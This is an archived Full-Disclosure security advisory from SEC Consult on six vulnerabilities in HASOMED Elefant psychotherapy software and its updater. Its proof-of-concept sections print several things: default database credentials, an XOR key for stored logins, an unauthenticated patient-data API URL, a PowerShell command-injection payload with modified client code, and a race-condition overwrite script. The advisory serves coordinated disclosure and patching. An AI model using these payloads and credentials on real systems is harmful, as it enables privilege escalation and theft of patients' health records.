lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <7c3aaf1d-1206-49be-b40d-09c4a80528e2@sec-consult.com>
Date: Fri, 8 Nov 2024 06:55:19 +0000
From: SEC Consult Vulnerability Lab via Fulldisclosure
 <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in
 HASOMED Elefant and Elefant Software Updater

SEC Consult Vulnerability Lab Security Advisory < 20241107-0 >
=======================================================================
               title: Multiple Vulnerabilities
             product: HASOMED Elefant and Elefant Software Updater
  vulnerable version: <24.04.00, Elefant Software Updater <1.4.2.1811
       fixed version: 24.04.00, Elefant Software Updater 1.4.2.1811
          CVE number: CVE-2024-50588, CVE-2024-50589, CVE-2024-50590,
                      CVE-2024-50591, CVE-2024-50592, CVE-2024-50593
              impact: Critical
            homepage: https://hasomed.de/produkte/elefant/
               found: 2024-04-15
                  by: Tobias Niemann (Office Bochum)
                      Daniel Hirschberger (Office Bochum)
                      Florian Stuhlmann (Office Bochum)
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Eviden business
                      Europe | Asia

                      https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
(Translated) "Elefant is the KBV-certified practice software from HASOMED,
specializing in the needs of psychological psychotherapists, child and
adolescent psychotherapists and medical psychotherapists. The software is ideal
for individual and group practices, private accountants, medical care centers
and training institutes in the fields of behavioral therapy, psychoanalysis,
depth psychology -based psychotherapy and systemic therapy."

Source: https://hasomed.de/produkte/elefant/


Business recommendation:
------------------------
The vendor provides a patch which should be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the
product conducted by security professionals to identify and resolve potential
further security issues.


Vulnerability overview/description:
-----------------------------------
1) Unprotected Exposed Firebird Database (CVE-2024-50588)
An unauthenticated attacker with access to the local network of the medical
office can use known default credentials to gain remote DBA access to the
Elefant Firebird database. The data in the database includes patient data and
login credentials among other sensitive data. In addition, this enables
an attacker to create and overwrite arbitrary files on the server filesystem
with the rights of the Firebird database ("NT AUTHORITY\SYSTEM").

2) Unprotected FHIR API (CVE-2024-50589)
An unauthenticated attacker with access to the local network of the medical
office can query an unprotected Fast Healthcare Interoperability Resources
(FHIR) API to get access to sensitive electronic health records (EHR).

3) Local Privilege Escalation via Weak Service Binary Permissions (CVE-2024-50590)
An attacker with local access the to medical office computer can escalate his
Windows user privileges to "NT AUTHORITY\SYSTEM" by overwriting one of two
Elefant service binaries with weak permissions.

4) Local Privilege Escalation via Command Injection (CVE-2024-50591)
An attacker with local access the to medical office computer can escalate his
Windows user privileges to "NT AUTHORITY\SYSTEM" by exploiting a command
injection vulnerability in the Elefant Update Service. The command injection
can be exploited by communicating with the Elefant Update Service which is
running as "SYSTEM" via Windows Named Pipes.

5) Local Privilege Escalation via Race Condition (CVE-2024-50592)
An attacker with local access the to medical office computer can escalate his
Windows user privileges to "NT AUTHORITY\SYSTEM" by exploiting a race condition
in the Elefant Update Service during the repair or update process.

6) Hardcoded Service Password (CVE-2024-50593)
An attacker with local access to the medical office computer can access
restricted functions of the Elefant Service tool by using a hardcoded
"Hotline" password.


Proof of concept:
-----------------
1) Unprotected Exposed Firebird Database (CVE-2024-50588)
Elefant uses a Firebird DB to store data. The Firebird server listens on all
interfaces on port 3050:

<unprotected_db_1.png>

An attacker can connect directly to the database as DBA if he can reach port
3050 of the Elefant server using the known Firebird default credentials
"SYSDBA:masterkey" and specifying the Elefant database path
"C:\Elefant1\ELEFANT.gdb".

<unprotected_db_2.png>

The database contains all Elefant data including patient data and the
obfuscated Elefant login data:

<unprotected_db_3.png>

To obtain the plain login credentials each byte must be xored with 0x1b.

In addition an attacker can create and overwrite arbitrary files on the server
filesystem with the rights of the database ("NT AUTHORITY\SYSTEM") via Firebird
delta files. Depending on other running software (i.e. MS IIS) RCE can be
achieved this way by uploading a webshell.

The weak default credentials are hardcoded into Elefant and Elefant Service.


2) Unprotected FHIR API (CVE-2024-50589)
While the Elefant client is running it listens on port 9090 on all interfaces.

<unprotected_api_1.png>

An unauthenticated FHIR API is exposed on this port. An attacker with access to
port 9090 can query the API for patient and physician data among other data.
The API can be queried via plain HTTP.
All patient data can for example be queried by visiting the following URL:
http://XXX.XXX.XXX.XXX:9090/Patient

The API responds with the patient data:

------------------------------------------------------------------------------
<?xml version="1.0"?>
<Bundle xmlns="http://hl7.org/fhir">
[...]
   <type value="searchset"/>
   <timestamp value="2024-05-08T20:38:26.859+02:00"/>
   <total value="4"/>
[...]
      <Patient>
         <id value="patient.3"/>
         <meta>
           <versionId value="1"/>
           <lastUpdated value="2024-05-31T14:42:39.685+02:00"/>
           <profile value="https://fhir.kbv.de/StructureDefinition/KBV_PR_VoS_Patient|2.1.0"/>
         </meta>
         <identifier>
           <type>
             <coding>
               <system value="http://terminology.hl7.org/CodeSystem/v2-0203"/>
               <code value="MR"/>
             </coding>
           </type>
           <system value="http://hasomed.de/Elefant/Patient"/>
           <value value="3"/>
         </identifier>
         <identifier>
           <use value="official"/>
           <type>
             <coding>
               <system value="http://fhir.de/CodeSystem/identifier-type-de-basis"/>
               <code value="PKV"/>
             </coding>
           </type>
           <system value="http://fhir.de/sid/pkv/kvid-10"/>
           <value value="aaaaa"/>
         </identifier>
         <name>
           <use value="official"/>
           <text value="Dr. POC Vorname POC Nachname"/>
           <family value="POC Nachname">
             <extension url="http://hl7.org/fhir/StructureDefinition/humanname-own-name">
               <valueString value="POC Nachname"/>
             </extension>
           </family>
           <given value="POC Vorname"/>
           <prefix value="Dr.">
             <extension url="http://hl7.org/fhir/StructureDefinition/iso21090-EN-qualifier">
               <valueCode value="AC"/>
             </extension>
           </prefix>
         </name>
         <gender value="female"/>
         <birthDate value="2018-11-07"/>
         <address>
           <type value="both"/>
           <line value="Teststr. 1">
             <extension url="http://hl7.org/fhir/StructureDefinition/iso21090-ADXP-streetName">
               <valueString value="Teststr."/>
             </extension>
             <extension url="http://hl7.org/fhir/StructureDefinition/iso21090-ADXP-houseNumber">
               <valueString value="1"/>
             </extension>
           </line>
           <city value="Bochum"/>
           <postalCode value="44801"/>
           <country value="D"/>
         </address>
       </Patient>
[...]
------------------------------------------------------------------------------

Similarly all practitioner information is available at:
http://XXX.XXX.XXX.XXX:9090/Practitioner/


3) Local Privilege Escalation via Weak Service Binary Permissions (CVE-2024-50590)
The default installation directory of Elefant is "C:\Elefant1" which is
writable for all users. In addition, the Elefant installer registers two
Firebird database services which are running as "NT AUTHORITY\SYSTEM".

<service_binary_1.png>

Both service binaries are user writable. This means that a local attacker can
rename one of the service binaries, replace the service executable with a new
executable, and then restart the system. Once the system has rebooted, the new
service binary is executed as "NT AUTHORITY\SYSTEM".


4) Local Privilege Escalation via Command Injection (CVE-2024-50591)
The Elefant Software Updater (ESU) consists of two components. An ESU service
which runs as "NT AUTHORITY\SYSTEM" and an ESU tray client which communicates
with the service to update or repair the installation and is running with user
permissions. The communication is implemented using named pipes. A crafted
message of type "MessageType.SupportServiceInfos" can be sent to the local ESU
service to inject commands, which are then executed as "NT AUTHORITY\SYSTEM".
The following part of the service is vulnerable against command injection,
because the input is passed on without filtering:

<command_injection_4.png>

The input is first split at ';', is then used to create a directory, and
finally reaches the sink at line 30. Because the input is split at ';' and the
creation of the directory must not fail before reaching the sink, only '&' can
be used to inject commands here, because Windows does not allow the characters
'\/:*?"<>|' in directory or filenames.  The following payload avoids the
forbidden characters, ';' and dynamically constructs the path of the target
script (C:\SEC\exec.ps1).

------------------------------------------------------------------------------
"& powershell.exe -NoExit -ep bypass powershell (Join-Path
     (Join-Path (Get-PSDrive c).root SEC)exec.ps1) #".
------------------------------------------------------------------------------

For this proof of concept, the ESU tray client "Info" function was modified to
inject commands into the ESU service. The payload must be injected into the
first parameter of "CollectServiceInfos" to successfully reach the sink in the
ESU service after being sent via a named pipe:

------------------------------------------------------------------------------
private void OnInfo(object sender, EventArgs e)
{
	string text = "C:\\SEC\\exec.ps1";
	TrayUtils.ShowMessageBox(new MessageBoxData
	{
		Message = "MOD: Put PS Script at " + text,
		Caption = "Info",
		ButtonType = MessageBoxButtons.OK,
		IconType = MessageBoxIcon.Asterisk
	});
	this.m_TrayManager.CollectServiceInfos("& powershell.exe -NoExit -ep bypass powershell (Join-Path
     (Join-Path (Get-PSDrive c).root SEC)exec.ps1) #", "dummy.zip");
}
------------------------------------------------------------------------------

In this proof of concept the client injects the payload and the ESU service
executes the powershell script at the user writable location C:\SEC\exec.ps1.
The content of the script is displayed below:
------------------------------------------------------------------------------
whoami > C:\secwashere
------------------------------------------------------------------------------

<command_injection_1.png>
<command_injection_2.png>

After the OK button is pressed, the command is injected and executed
as "NT AUTHORITY\SYSTEM".

<command_injection_3.png>


5) Local Privilege Escalation via Race Condition (CVE-2024-50592)
Another way to escalate local privileges is to use the Elefant Software Updater
"repair" function. When using the repair function, the service queries the
server for a list of files and their hashes. In addition, instructions to
execute binaries to finalize the repair process are included:

------------------------------------------------------------------------------
POST /eup/release/prod/backend/api/ReadApplicationVersion HTTP/2
Host: eup.hasomed.de
Accept: application/json
Apikey: fb[...]
Content-Type: application/json; charset=utf-8
Content-Length: 242

{"programName":"elefant"
[...]
------------------------------------------------------------------------------

The server responds with:
------------------------------------------------------------------------------
HTTP/2 200 OK
[...]
"hash":"","fileSize":0,"type":"execute","filePath":"PostESUUpdate.exe",
"parameters":"","hint":"Abschließende Schritte nach der Installation des Elefant-Updates
durch den ESU"},{"hash":"","fileSize":0,"type":"execute","filePath":"Support\\Update_OpenJava.exe"
,"parameters":"/verysilent","hint":"Aktualisierung der OpenJava-Instanz"}]}
------------------------------------------------------------------------------

The executables are executed as "NT AUTHORITY\SYSTEM" after they are copied over to
the user writable installation folder (C:\Elefant1). This means that a user can
overwrite either "PostESUUpdate.exe" or "Update_OpenJava.exe" in the time frame
after the copy and before the execution of the final repair step. The overwritten
executable is then executed as "NT AUTHORITY\SYSTEM".

The following steps can be performed to reliably execute the local privilege
escalation using PostESUUpdate.exe:

1. Delete PostESUUpdate.exe in C:\Elefant1 before starting the repair function.
2. Start repair function in ESU
3. Continuously check if PostESUUpdate.exe has been copied over to C:\Elefant1
    yet
4. Immediately overwrite the executable and wait for the execution as "NT
    AUTHORITY\SYSTEM"

The following powershell script can be used to perform steps 3 and 4:
------------------------------------------------------------------------------
// delete PostESUUpdate.exe before starting the update/repair
While($true)
{
If(Test-Path -path "PostESUUpdate.exe" -PathType Leaf){
Copy-Item -Force -Path "exec.exe" -Destination "PostESUUpdate.exe"
}
}
------------------------------------------------------------------------------

6) Hardcoded Service Password (CVE-2024-50593)
To use certain restricted functions in the Elefant Service Software it is
required to enter a hotline password.

<hardcoded_service_1.png>

This password is hardcoded into the Elefant Service binary, which is shipped
with the software:

<hardcoded_service_2.png>


Vulnerable / tested versions:
-----------------------------
The following version has been tested which was the latest version available
at the time of the test:
* Elefant 24.02.02
* Elefant Software Updater 1.2.0.33679
* Elefant Service 05.02.00


Vendor contact timeline:
------------------------
2024-07-01: Contacting vendor through security@...omed.de.
2024-07-04: First vendor response. Security contact has time off and will reply on 07-15.
2024-07-12: Security contact is back and requests the advisory.
2024-07-15: Sending advisory to vendor contact.
2024-07-18: Security contact informs us that patches for part of the issues are planned
             for CW32; due to vacation and regulatory issues the other issues can only
             be fixed after CW42, therefore they request for an extension to CW42 for the
             deadline; We extend the deadline to CW42;
2024-07-29: Security contact informs us that the first three fixes have been implemented
             in Version 24.03.03. According to the changelog, the update contains fixes for
             findings 1 and 6.
2024-09-04: Security contact informs us that all development is progressing as planned and
             the new release will be ready in CW 42.
2024-10-16: Security contact sends new release notes for version 24.04.00.
             According to the changelog and security contact, the update contains fixes for
             finding 2 and 3.
2024-10-23: Security contact informs us that the update 1.4.2.1811 of the Elefant
             Software Updater contains fixes for findings 4 and 5, and that adjustments
             for the FHIR API were made in version 24.04.00.
2024-10-28: Sending vendor latest advisory draft, informing about release on 31st October.
2024-10-30: Vendor thanks for CVE, no further feedback except first updates
             for the Software Updater are already available since 2024-08-21.
2024-11-05: Informing vendor about delay, postponed to 7th November.
2024-11-07: Coordinated release of advisory.


Solution:
---------
The vendor provides a patched version 24.04.00 (or higher) which can be downloaded from
https://hasomed.de/produkte/elefant/ or via the Elefant Software Updater.

This patched version does also include fixes for the Elefant Software Updater
which were shipped in version 1.4.2.1811 of the updater.


Workaround:
-----------
While workarounds such as modifying the Elefant windows firewall rules and
manually adjusting file permissions in the installation folder are feasible
workarounds for some of the vulnerabilities, it is recommended to install
the patches provided by the vendor.


Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Eviden business
Europe | Asia

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Eviden business. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: https://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Tobias Niemann, Daniel Hirschberger, Florian Stuhlmann / @2024

Download attachment "command_injection_1.png" of type "image/png" (4161 bytes)

Download attachment "command_injection_2.png" of type "image/png" (3572 bytes)

Download attachment "command_injection_3.png" of type "image/png" (1043 bytes)

Download attachment "command_injection_4.png" of type "image/png" (23556 bytes)

Download attachment "hardcoded_service_1.png" of type "image/png" (14365 bytes)

Download attachment "hardcoded_service_2.png" of type "image/png" (9248 bytes)

Download attachment "service_binary_1.png" of type "image/png" (9219 bytes)

Download attachment "unprotected_api_1.png" of type "image/png" (3423 bytes)

Download attachment "unprotected_db_1.png" of type "image/png" (8246 bytes)

Download attachment "unprotected_db_2.png" of type "image/png" (6907 bytes)

Download attachment "unprotected_db_3.png" of type "image/png" (6562 bytes)

Download attachment "smime.p7s" of type "application/pkcs7-signature" (4201 bytes)

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ